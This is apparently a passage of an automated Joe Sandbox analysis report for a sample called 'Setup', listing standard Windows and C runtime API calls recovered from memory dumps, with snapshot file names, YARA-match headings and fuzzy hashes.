                                                                                                                                                                                                                                                        • Part of subcall function 02D5E387: _Maklocchr.LIBCPMT ref: 02D5E3B6
                                                                                                                                                                                                                                                        • Part of subcall function 02D5E387: _Maklocchr.LIBCPMT ref: 02D5E3CC
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Maklocchr$GetvalsH_prolog3_
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 031D93A9
                                                                                                                                                                                                                                                        • Part of subcall function 031D92FE: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,031D81B3,?,00000000,-00000008), ref: 031D935F
                                                                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 031D93E1
                                                                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 031D9401
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,03205040,?,031D3F69,?,?,00000000,?), ref: 031D3F1B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0319E1CF
                                                                                                                                                                                                                                                      • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0319E1F1
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000,?,00000000,00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0319E210
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0319E226
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02D732AA
                                                                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02D732C3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value___vcrt_
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031A890B
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031A8916
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031A8984
                                                                                                                                                                                                                                                        • Part of subcall function 031A8A97: std::locale::_Locimp::_Locimp.LIBCPMT ref: 031A8AAF
                                                                                                                                                                                                                                                      • std::locale::_Setgloballocale.LIBCPMT ref: 031A8931
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D5A0EF
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D5A0FA
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D5A168
                                                                                                                                                                                                                                                        • Part of subcall function 02D5A27B: std::locale::_Locimp::_Locimp.LIBCPMT ref: 02D5A293
                                                                                                                                                                                                                                                      • std::locale::_Setgloballocale.LIBCPMT ref: 02D5A115
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D61072
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6107C
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D610ED
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1383202999-0
                                                                                                                                                                                                                                                      • Opcode ID: 70c87bdda0fd07e2d3989441a3f7056200c31740e272e497f8c858e2d1b7f537
                                                                                                                                                                                                                                                      • Instruction ID: 46243b58354380158f88b042e835c78d2a28e01291d51af42de9330aa04c29b2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70c87bdda0fd07e2d3989441a3f7056200c31740e272e497f8c858e2d1b7f537
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61F0CD319001259BCF04EAA0C8646BEB226EF50314F604119E9186B3D0DF35DE0A8BA5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D61107
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D61111
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D61182
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1383202999-0
                                                                                                                                                                                                                                                      • Opcode ID: d5ff3716c4062411fd575accb4c8212aee0a45f577c63d983057cd3d5edba7ca
                                                                                                                                                                                                                                                      • Instruction ID: 9071f3a1af1f36988e4ae34f3e10307ca949ded2c9a4ddd6461a3695a2c7873c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5ff3716c4062411fd575accb4c8212aee0a45f577c63d983057cd3d5edba7ca
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7F0F0319001259BCF04EB64C8647FE7326EF50324F604519E9286B3C0DF38CE058FA4
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D60FDD
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D60FE7
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D61058
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1383202999-0
                                                                                                                                                                                                                                                      • Opcode ID: ee4847afd6d8dd9f3f0054ed2b120fc231305d76b8d05e3d82fa52ff576c59bf
                                                                                                                                                                                                                                                      • Instruction ID: c4dd140be2a8837d63c832d0650121173df781f0caa52187fffac58dd04d9303
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee4847afd6d8dd9f3f0054ed2b120fc231305d76b8d05e3d82fa52ff576c59bf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4FF0C7319001699BCF18EBA4C964BFE7266EF40324F600519E8286B3D4DF38CE09CBA5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D60F48
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D60F52
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D60FC3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1383202999-0
                                                                                                                                                                                                                                                      • Opcode ID: 4b402089a9de233b4e65ebc637db98c4c1fb353b1df5abb15a3887595f7e0078
                                                                                                                                                                                                                                                      • Instruction ID: 464ba65cca5f106a007291f3beebe0df24be6596022ef044ea8f75e060ee6eca
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b402089a9de233b4e65ebc637db98c4c1fb353b1df5abb15a3887595f7e0078
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2F0F0319002259BCF04EB64C9547FEA726EF50325F604119E9146B3C0DF749E0A8BB5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • WriteConsoleW.KERNEL32(00000000,?,031C3AD5,00000000,00000000,?,031DD52D,00000000,00000001,?,?,?,031D29BA,?,00000000,00000000), ref: 031E063E
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,031DD52D,00000000,00000001,?,?,?,031D29BA,?,00000000,00000000,?,?,?,031D2F5D,?), ref: 031E064A
                                                                                                                                                                                                                                                        • Part of subcall function 031E0610: CloseHandle.KERNEL32(03205AD0,031E065A,?,031DD52D,00000000,00000001,?,?,?,031D29BA,?,00000000,00000000,?,?), ref: 031E0620
                                                                                                                                                                                                                                                      • ___initconout.LIBCMT ref: 031E065A
                                                                                                                                                                                                                                                        • Part of subcall function 031E05C6: CreateFileW.KERNEL32(031F4E78,40000000,00000003,00000000,00000003,00000000,00000000,031E05F5,031DD51A,?,?,031D29BA,?,00000000,00000000,?), ref: 031E05D9
                                                                                                                                                                                                                                                      • WriteConsoleW.KERNEL32(00000000,?,031C3AD5,00000000,?,031DD52D,00000000,00000001,?,?,?,031D29BA,?,00000000,00000000,?), ref: 031E066F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2744216297-0
                                                                                                                                                                                                                                                      • Opcode ID: 8b27fda9333da75bb62542bf5914f7c64f041db5407483d8ddb5ef727aba23bb
                                                                                                                                                                                                                                                      • Instruction ID: fd7681f32d861419c1cbf20ca7c94bffecc8183802f3104c74bcd22cd88ec24e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b27fda9333da75bb62542bf5914f7c64f041db5407483d8ddb5ef727aba23bb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9EF0123A400614BBCF227FD5DC08A8A7F25FF4D3A1F144051F91999110D77389609FA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6119C
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D611A6
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 02D611E0
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D61217
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3moneypunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3160146232-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(031EE1A0), ref: 031AB856
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,031EE1BC), ref: 031AB864
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,031EE1D0), ref: 031AB875
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,031EE1F0), ref: 031AB886
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 667068680-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031A6956
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031A6985
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                      • String ID: .!
                                                                                                                                                                                                                                                      • API String ID: 593203224-2740948462
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __aulldiv
                                                                                                                                                                                                                                                      • String ID: +$-
                                                                                                                                                                                                                                                      • API String ID: 3732870572-2137968064
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __aulldiv
                                                                                                                                                                                                                                                      • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                                                                                      • API String ID: 3732870572-1956417402
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0319DDE0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID: false$true
                                                                                                                                                                                                                                                      • API String ID: 118556049-2658103896
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D4F5C4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID: 0vH$8vH
                                                                                                                                                                                                                                                      • API String ID: 118556049-2226986219
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0319DC7A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID: false$true
                                                                                                                                                                                                                                                      • API String ID: 118556049-2658103896
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D4F45E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID: 0vH$8vH
                                                                                                                                                                                                                                                      • API String ID: 118556049-2226986219
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 031BF8AF
                                                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 031BF963
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                      • API String ID: 3480331319-1018135373
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 02D71093
                                                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 02D71147
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                      • API String ID: 3480331319-1018135373
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Catch
                                                                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                                                                      • API String ID: 78271584-2084237596